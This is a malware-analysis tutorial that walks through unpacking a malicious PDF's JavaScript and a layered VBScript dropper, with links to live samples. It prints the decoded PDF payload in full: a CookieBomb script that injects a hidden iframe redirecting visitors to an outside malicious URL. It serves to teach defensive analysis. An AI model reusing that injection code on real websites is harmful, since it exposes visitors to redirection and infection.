PDF Analysis and Script UnpackingSample 1 (PDF)Download the following sample:
sampleprep2lvl2.zipWarning: This is live malware!The password is "infected".
TrID will tell you that this is a PDF file.
Download
PDFStreamDumper. You can also find a small tutorial for this tool in
Analyzing Suspicious PDF Files With PDF Stream Dumper.
Open the programme, click Load and navigate to our sample. Browse through the streams for anything suspicious. In the very last stream you will find packed JavaScript code.
Script unpacking, no matter if JavaScript, VBScript, Perl or other, is in most cases easy. You need to look for "eval" or a function with similar purpose.
eval will execute a string as JavaScript, making it perfect to use a converted string to save code in.
You just need to replace the eval with a function that prints the output, execute the code and you get the unpacked script. In JavaScript you use document.write as replacement.
Download
Javascript Deobfuscator. Copy and paste the JavaScript code from PDFStreamDumper to Javascript Deobfuscator. You can see that the code consists of two parts, a large packed string and a decryption routine for that string. The eval is usually at the very end of the function. This is also the case here, only that the variable e has been set to eval right in the beginning.
Beginnning:
e = eval;End:
e(zaz);The good thing is that you don't need to understand the decryption code to unpack this script. Just, mark the 'e' in e(zaz); with the mouse, then click the Convert button to get the unpacked script. Click Copy Output to Input and then Beautify to get a proper indentation.
The unpacked code looks as follows:
function zzzfff() {
var zte = document.createElement('iframe');
zte.src = 'http://f2f365.com/counter.php';
zte.style.position = 'absolute';
zte.style.border = '0';
zte.style.height = '1px';
zte.style.width = '1px';
zte.style.left = '1px';
zte.style.top = '1px';
if (!document.getElementById('zte')) {
document.write('<div id=\'zte\'></div>');
document.getElementById('zte').appendChild(zte);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}The purpose of the code is probably not immediately clear. But there is an interesting URL in it, google for the URL
hxxp :// f2f365 . com/counter . php
One of the very first matches should be
Proof of Concept of "CookieBomb" code injection attack The article lists our URL.
The shown code is roughly similar and explained well in the article:
The code in the template above means: When a cookie-enabled browser accessing these infected sites, the codes will be executed in JavaScript environment to check whether your browser already have a specific cookie and value , if not then that cookie will be created for you. At the same time, no matter you have the cookie or not you will be redirected to the other site via a hidden IFRAME
Do not rely on that only, verify that the description fits to the code that you have there.
After the redirection was made, the PHP or (Java, etc) script (masked as those cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php , and so on..) will "suppose" to check the cookie's values and its etc condition with then execute an "action" upon those condition meets which this "action" is never be good. They can execute another redirection, or a straight infection, depends on the needs of the hacker. Is a simple scheme, it works, and it is deploy-able to the mass automation scheme.
We cannot verify what the actual counter.php script does in our case, because it is not accessible anymore. But in any case this PDF redirects a victim to this bad URL with the counter.php script, which might have infected the system.
Sample 2 (VBScript)Download the following sample:
Microsoft Word.WsF.vir.zipWarning: This is live malware!The password is "infected".
Transfer this sample to your VM for unpacking. Open it in a text editor. The sample consists of a large encoded string and a small VBScript unpacking code in the beginning. The function HIO seems to be responsible for unpacking.
You will find code that looks like this:
FUnction:Execute(HIO("FMdN9R8lOReYpG7Xn869nKcnS87pPk2L9gU <large string>The Execute is our eval equivalent here. We need to replace this with a function that prints out the string instead of executing it. So you can, e.g., google for "vbscript write to console" and you will find out that you need to use WScript.Echo in combination with cscript.exe to print to the console. So replace Execute with WScript.Echo as follows:
FUnction: WScript.Echo(HIO("FMdN9R8lOReYpG7Xn869nKcnS87pPk2L9gU <large string>In the next step execute the script using the terminal and cscript.exe, the > will write the output into the file unpacked1.vbs:
cscript.exe Microsoft Word.WsF > unpacked1.vbsNote: If you doubleclick a VBScript file (.WsF or .vbs extension), you will usually call it via wscript.exe. You can try that too, but the output will be shown in a message window, which is not what we want. Using cscript.exe instead of wscript.exe ensures that the output is written to the terminal.
Open the unpacked1.vbs in a text editor and you will see that this file is packed with another layer. Just repeat the step. Search for the Execute and replace it with WScript.Echo. You will find that it looks as follows:
EXEcute QQNote: VBScript is case insensitive, so EXEcute is the same as execute or Execute.
Remove the header from the file or you won't be able to execute it as VBScript:
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.Then run the script from the command line to unpack it:
cscript.exe unpacked1.vbs > unpacked2.vbsThis time you get a smaller output that looks as follows:
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.
XUo= SPLIT(XUo,".")
FOR XjM = 1 TO UBOUND(XUo)
OeT=OeT&cHr(XUo(XjM)/18)
NEXT
eXeCUTEGlObaL(OeT)
This can't be the the whole unpacked virus, right?
There is also no Execute, but an eXeCUTEGlObaL. Look it up in
MSDN, it will tell you:
Executes one or more specified statements in the global namespace of a script.
This code in unpacked2.vbs is only works together with the code in unpacked1.vbs. So open up unpacked1.vbs in a text editor again, and replace the following line:
WScript.Echo QQWith this code:
XUo= SPLIT(XUo,".")
FOR XjM = 1 TO UBOUND(XUo)
OeT=OeT&cHr(XUo(XjM)/18)
NEXT
WScript.Echo(OeT)
Execute the modified unpacked1.vbs:
cscript.exe unpacked1.vbs > unpacked3.vbsOpen unpacked3.vbs in a text editor. This code is not packed anymore, but obfuscated. You might see that it consists of only one line. The colon is a statement separator in VBScript. Use the search and replace function of your text editor to replace the colon with a newline. E.g., in Notepad++ you press
Ctrl + F, click the tab
replace and select the
extended modus that allows \r, \n, \t etc. Then you can put the colon as search string and the \n as replacement string and press
replace all.
You will already be able to read the code better. But any strings in the code are still obfuscated. Our programming skills will come in handy to deobfuscate the strings. I decided to use Python for this and came up with the following code:
import re
fname = "unpacked3.vbs"
with open(fname) as f:
content = f.readlines()
for line in content:
found = re.findall(r"X\((\d+)\)", line)
for item in found:
line = line.replace("&X("+item+")", chr(int(item)))
line = line.replace("X("+item+")", chr(int(item)))
print line.lower(),The script will print the deobfuscated code to the command line.
The result is not perfect, because the strings will miss the quotation marks, but it is more than enough to be able to read the code.
You may now analyse the unpacked script further and answer yourself the following questions:
What registry entries does the sample create?
How does the sample spread?
What malware type and malware family is it?
